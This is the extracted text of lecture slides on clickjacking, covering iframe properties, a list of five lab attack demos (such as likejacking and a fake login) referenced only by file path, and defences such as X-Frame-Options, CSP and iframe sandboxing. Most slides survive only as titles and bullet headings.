Clickjacking

Attack

ClickJacking-slides Page 1
Outline

❖ Iframe and its properties

❖ Clickjacking using iframes
❖ Countermeasures (CSP)
❖ Iframe's security features

❖ Reading: will be included in the 3rd edition

❖ Lab: Under development
❖ The code used in this lecture is included in the resource

ClickJacking-slides Page 2
Lab Setup
Elgg website: www.seed-server.com

Attacker: www.attacker32.com

Defense: www.bank32.com

Add the following to /etc/hosts

ClickJacking-slides Page 3
 End

ClickJacking-slides Page 4
Iframe and its
Properties

ClickJacking-slides Page 5
Iframe: Inline Frame

ClickJacking-slides Page 6
Overlapping iframes
URL: http://www.attacker32.com/test1.html

ClickJacking-slides Page 7
Transparent iframe
URL: http://www.attacker32.com/test1.html

ClickJacking-slides Page 8
Features versus Security

ClickJacking-slides Page 9
 End

ClickJacking-slides Page 10
Attack Using
Transparent iframe

ClickJacking-slides Page 11
Attack 1 Demo
URL: http://www.attacker32.com/

ClickJacking-slides Page 12
Attack 1: LikeJacking

Code: image_apache_server/attacker32/attack/clickjacking1.html

❖ Inside bottom1.html

ClickJacking-slides Page 13
Attack 2: Adding A Friend

Code: image_apache_server/attacker32/attack/clickjacking2.html

ClickJacking-slides Page 14
Attack 3: Deleting A Friend

Code: image_apache_server/attacker32/attack/clickjacking3.html

ClickJacking-slides Page 15
 End

ClickJacking-slides Page 16
Attack Using
Small-size iframe

ClickJacking-slides Page 17
Attack 4 Demo
URL: http://www.attacker32.com/

ClickJacking-slides Page 18
Attack 4: Using Small-Size iFrame

Code: image_apache_server/attacker32/attack/clickjacking4.html

ClickJacking-slides Page 19
Attack 5: Fake Login

Code: image_apache_server/attacker32/attack/clickjacking5.html

❖ Inside fake_login.html

ClickJacking-slides Page 20
 End

ClickJacking-slides Page 21
Countermeasures

ClickJacking-slides Page 22
Old Idea: Framekiller/Framebuster
❖ Example

ClickJacking-slides Page 23
X-Frame-Options Approach
❖ Options
○ X-Frame-Options: DENY
○ X-Frame-Options: SAMEORIGIN

❖ Experiment: Three Pages from bank32.com

❖ Load them into attacker32.com's iframes

❖ Load them into bank32.com's iframes

ClickJacking-slides Page 24
ClickJacking-slides Page 25
CSP (Content Security Policy) Approach
❖ Options

❖ Experiment: Three Pages from bank32.com

❖ Load them into attacker32.com's iframes

❖ Load them into bank32.com's iframes

ClickJacking-slides Page 26
❖ Setting CSP policy on Apache

ClickJacking-slides Page 27
 End

ClickJacking-slides Page 28
Security Features
of iframe

ClickJacking-slides Page 29
Same-Origin Policy of Iframe
❖ Iframes

❖ Parent Accessing Child

❖ Child Accessing Parent

❖ Child Acessing Siblings

ClickJacking-slides Page 30
Experiment Design

ClickJacking-slides Page 31
Using Iframe to Sandbox Content
❖ Setting Sandbox

❖ Options
○ allow-same-origin
○ allow-scripts
○ allow-forms
○ allow-modals
○ allow-top-navigation

ClickJacking-slides Page 32
Sandboxing Dynamic Content
❖ Setting Sandbox

ClickJacking-slides Page 33
 End

ClickJacking-slides Page 34
Summary

ClickJacking-slides Page 35
Summary
❖ Iframe, its attributes and security features

❖ Clickjacking attacks

❖ Countermeasures

ClickJacking-slides Page 36
 End

ClickJacking-slides Page 37